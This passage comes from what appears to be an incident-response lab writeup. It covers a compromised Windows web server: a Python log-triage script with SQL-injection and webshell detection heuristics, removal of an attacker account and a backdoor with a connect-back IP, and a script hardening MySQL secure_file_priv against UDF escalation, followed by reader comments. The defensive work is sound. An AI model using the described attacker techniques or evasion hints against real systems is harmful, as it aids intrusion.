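    # everything between the method and the protocol token is the target.
    if len(parts) >= 3 and parts[-1].startswith("HTTP/"):
        target = " ".join(parts[1:-1])
    else:
        target = " ".join(parts[1:])  # e.g. the bare "-" of a 408
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": method,
            "target": target, "path": target.split("?", 1)[0],
            "status": int(m.group("status"))}


def is_noise(entry):
    """The writeup's first pass: 404 responses are scanner/crawler noise here."""
    return entry["status"] == 404


def sqli_indicators(target):
    """Names of the injection indicators found in the request's query string."""
    query = unquote_plus(target).upper().partition("?")[2]
    return [name for name, rx in INDICATORS if rx.search(query)]


def webshell_candidates(entries):
    """Writeup heuristic, stated as an assumption: a source that has been POSTing to
    phpMyAdmin fetches a never-before-seen .php path with GET, then POSTs to it."""
    seen, pma_posters, cands = set(), set(), {}
    for e in entries:
        path, ip = e["path"], e["ip"]
        if e["method"] == "POST" and path.startswith("/phpmyadmin/"):
            pma_posters.add(ip)
        elif (e["method"] == "GET" and path.endswith(".php") and path not in seen
              and ip in pma_posters and not path.startswith("/phpmyadmin/")):
            cands[path] = {"ip": ip, "first_get": e["ts"], "posts": 0}
        elif e["method"] == "POST" and path in cands:
            cands[path]["posts"] += 1
        seen.add(path)
    return {p: c for p, c in cands.items() if c["posts"] > 0}


def triage(log_text):
    """Run the whole pass over a log and return a report dict."""
    entries, dropped = [], 0
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        if is_noise(e):
            dropped += 1
            continue
        entries.append(e)
    hits = [{"ts": e["ts"], "ip": e["ip"], "target": e["target"], "indicators": ind}
            for e in entries if (ind := sqli_indicators(e["target"]))]
    return {"kept": len(entries), "dropped_noise": dropped, "sqli_hits": hits,
            "post_paths": Counter(e["path"] for e in entries if e["method"] == "POST"),
            "webshell_candidates": webshell_candidates(entries)}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    print(f"kept {report['kept']} lines, dropped {report['dropped_noise']} as 404 noise")
    for h in report["sqli_hits"]:
        print("SQLi", h["ts"], h["ip"], h["indicators"], h["target"][:60])
    print("POST targets:", report["post_paths"].most_common(3))
    print("webshell candidates:", report["webshell_candidates"])
```

Running it against a real log of a few tens of thousands of lines, the `post_paths` counter is what shows the phpMyAdmin burst, and `webshell_candidates` narrows the follow-up to the one path worth opening on disk; the indicator list is deliberately coarse, since the point of the pass is to reduce the log to the handful of requests a human then reads.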

image-20221031122009341.png

The hacker's account (delete the account the hacker added):

Here you can refer to my article mentioned above. I don't know whether they hid the account, but hidden or not,
wmic useraccount get Name will show it. Saw a harry, deleted it, hit check, and it passed.

image-20221031122318451.png

Backdoor trojan (enter the IP of the server the hacker's backdoor trojan connects to):

I don't know how everyone else handled this one. Since we ran a related drill a few days ago and this environment allows it, I just downloaded 火绒 and D盾 and ran a scan. Mixed results: it automatically identified the trojan process and deleted it, and the later check passed, but I hadn't looked at what was inside yet, so I then wasted a few minutes searching for it; in the end I restored the file and exited 火绒 before I could see it:

image-20221031133500883.png

In system6.exe the backdoor trojan's connect-back IP was found: 23.23.23.23:1996

Harden the server (set the server account policy minimum password length to 8)

This one is also fairly simple:

image-20221031132115757.png

After changing it, refresh the policy: gpupdate /force

image-20221031132233731.png

Delete the trojan (kill and delete the backdoor trojan the hacker left behind):

Just terminate and delete the process found above, or use 火绒剑 and clean it up with one click (evil grin.jpg)

Fix the vulnerability (fix the vulnerability the hacker used for privilege escalation):

Once you know the vulnerability is UDF privilege escalation, fixing it is fairly simple, but my own fumbling wasted some time.
My first reaction: --awkward--|

image-20221031132826645.png

UDF privilege escalation requires knowing the MySQL username and password and being able to log in remotely. My first reaction was: if I change the password, the hacker won't know it anymore, right? But that would break my own site too, which means further changes to the configuration file, and the task also says not to change the account password, so a different approach is needed;

It also requires MySQL to have permission to write files, i.e. secure_file_priv is empty:
Checking the secure-file-priv feature

  The secure-file-priv parameter restricts which directory LOAD DATA, SELECT … OUTFILE, and LOAD_FILE() may read from or write to.

  When secure_file_priv is NULL, mysqld is not allowed to import or export files at all
  When secure_file_priv is /tmp/, mysqld may import/export only under the /tmp/ directory
  When secure_file_priv has no specific value, mysqld's import/export is unrestricted
  Check the value of the secure-file-priv parameter:

image-20221031135256466.png

Here you can change it to a specific directory or to NULL,

image-20221031135753261.png

Below, I changed the value to NULL. When I first tried, this last one took a bit of time; after changing it, restart the service and the check is OK.
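As an added example (not from the post), the following Python applies the three-way reading of secure_file_priv given above to a my.ini and rewrites the [mysqld] section to the hardened value. The sample my.ini is constructed, and `classify_secure_file_priv`, `read_secure_file_priv` and `harden_my_ini` are my own helpers; they edit the configuration text only, so the service restart the author mentions still has to be done separately.

```python
"""Audit and harden the MySQL secure_file_priv setting in a my.ini, following the
three cases described in the post. Added example, not code from the original post."""
import re

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
KEY_RE = re.compile(r"^\s*secure[_-]file[_-]priv\s*=\s*(?P<value>.*?)\s*$", re.IGNORECASE)

# Constructed sample of the weak state: an empty value means no restriction on
# LOAD DATA / SELECT ... OUTFILE / LOAD_FILE(), which UDF escalation relies on.
WEAK_MY_INI = """\
[client]
port=3306

[mysqld]
port=3306
secure_file_priv=""
"""


def classify_secure_file_priv(value):
    """Map a secure_file_priv value (None if the key is absent) to the post's three cases."""
    if value is None:
        return "unrestricted"
    v = value.strip().strip('"').strip("'").strip()
    if v == "":
        return "unrestricted"   # no specific value: import/export allowed anywhere
    if v.upper() == "NULL":
        return "disabled"       # NULL: mysqld refuses file import/export entirely
    return "restricted"         # a directory: import/export only under that directory


def read_secure_file_priv(ini_text):
    """Return the raw value set under [mysqld], or None if the key is absent."""
    in_mysqld = False
    for line in ini_text.splitlines():
        sec = SECTION_RE.match(line)
        if sec:
            in_mysqld = sec.group("name").strip().lower() == "mysqld"
            continue
        if in_mysqld:
            key = KEY_RE.match(line)
            if key:
                return key.group("value")
    return None


def harden_my_ini(ini_text, value="NULL"):
    """Rewrite the [mysqld] section so secure_file_priv equals `value`. NULL disables
    file import/export; pass a quoted directory instead if the site genuinely needs
    LOAD DATA / OUTFILE there. Duplicate keys are collapsed into the one new line."""
    new_line = f"secure_file_priv={value}"
    out, in_mysqld, written, have_section = [], False, False, False
    for line in ini_text.splitlines():
        sec = SECTION_RE.match(line)
        if sec:
            if in_mysqld and not written:   # leaving [mysqld] without having set it
                out.append(new_line)
                written = True
            in_mysqld = sec.group("name").strip().lower() == "mysqld"
            have_section = have_section or in_mysqld
        elif in_mysqld and KEY_RE.match(line):
            if not written:                 # replace the first occurrence, drop repeats
                out.append(new_line)
                written = True
            continue
        out.append(line)
    if not written:                         # key absent: append it, creating the section if needed
        if not have_section:
            out.append("[mysqld]")
        out.append(new_line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    before = read_secure_file_priv(WEAK_MY_INI)
    print("before:", repr(before), "->", classify_secure_file_priv(before))
    hardened = harden_my_ini(WEAK_MY_INI)
    after = read_secure_file_priv(hardened)
    print("after: ", repr(after), "->", classify_secure_file_priv(after))
    print(hardened)
```

After writing the hardened file back, restart the MySQL service and confirm with `SHOW VARIABLES LIKE 'secure_file_priv'` that the running server reports the new value; the setting is read-only at runtime, which is why the author's check only passed after the restart.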

Tags: none

  1. xd

    Besides bugku, are there other ranges of this type?

    1. bit

      There are quite a few, 春秋云镜 and the like

  2. xd

    What direction does the blogger work in?

  3. 菜狗

    You're amazing, master. I happened to do this challenge yesterday and saw your article today.
    1. Privilege escalation method: I didn't know how to determine it, didn't solve it;
    2. Webshell: couldn't find it. Tried D盾 and 河马, didn't find it; in the end I just deleted the whole site and the check passed, haha
    3. Hacker account: deleted harry
    4. Backdoor connection IP: I used netstat -ano and tried the connected IPs one by one
    5. Hardening the server: standard operation
    6. Deleting the trojan: from the IP in step 4 I found the corresponding PID, then found the backdoor file system6.exe and deleted it
    7. Fixing the vulnerability: didn't know the escalation method, so didn't know how to fix it, skipped
    The main thing is this environment has nothing in it, some things have to be downloaded on the spot, which is annoying; I stared at the logs for ages and didn't find anything, sob

    1. bit

      Once you've done more of these, a lot of it becomes "rules of thumb"; take it slowly
      1. The udf file under the SQL directory naturally leads you to think of UDF privilege escalation;
      2. For finding the webshell it's mainly about reading the logs, because AV-evading shells are a dime a dozen and some can't be found by those tools; the logs give a much clearer picture of what they did;
      3. Nothing much to say about deleting the account;
      4. It's best to know why it is that IP;
      5. Also a fairly basic operation;
      6. Well reasoned, nice;
      7. If you don't know the first one, this one is naturally confusing, which is normal; once you know their escalation technique, fixing the vulnerability in a targeted way is easy.
      For this challenge what they give you is quite a lot, and from an emergency-hardening standpoint, if the other side hasn't deleted the logs, a targeted audit of the logs can turn up a lot of useful information;
      so for an attacker, cleaning up traces is important, and for a defender, timely backups and protection are just as crucial.

  4. Moon、

    Master, may I ask where the log page at the start was viewed? When I connected, all I saw was a phpstudy program

    1. bit

      Look around in the folders; I forget exactly where. Find the folder for the corresponding middleware, then find the log file; it's obvious which one is the site's log

  5. 睡觉人

    Learned something

  6. 大米

    Learned something

10 comments so far